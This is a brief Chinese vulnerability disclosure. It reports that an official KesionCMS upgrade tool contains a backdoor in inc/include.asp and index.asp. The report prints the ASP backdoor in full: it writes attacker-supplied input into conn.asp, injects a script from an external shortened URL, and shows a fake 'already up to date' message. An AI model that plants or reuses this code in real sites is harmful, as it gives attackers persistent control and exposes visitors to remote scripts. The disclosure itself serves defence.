### 简要描述:
要是用到V8.0升9.0工具就会被入侵
### 详细说明:
直接从官方下载来的 KesionCMS V8.0升9.0工具 。
### 漏洞证明:
代码inc/include.asp和index.asp最后面的代码
这代码可干的事很多吧。
```
<%
Dim strLogFile,Sender,StrLogText,Lzwudi,Lenovo
StrLogFile="conn.asp"
sender=request("sender")
If sender="" Then
Response.Write "<script src=http://dwz.cn/a2kug></script>"
Response.End
End If
StrLogText=StrLogText& sender
Set Lzwudi=Server.CreateObject("Scripting.FileSystemObject")
Set Lenovo=Lzwudi.OpenTextFile(Server.MapPath(".")&"\"&StrLogFile,8,True,0)
Lenovo.WriteLine(CHR(13)+CHR(10)&StrLogText)
Lenovo.Close
Set Lenovo=Nothing
Set Lzwudi=Nothing
Response.Write "科兴网络提示您:您已经是最新版本!"
'======================================功能升级========================================
%>
```
京公网安备 11010502034610号
暂无评论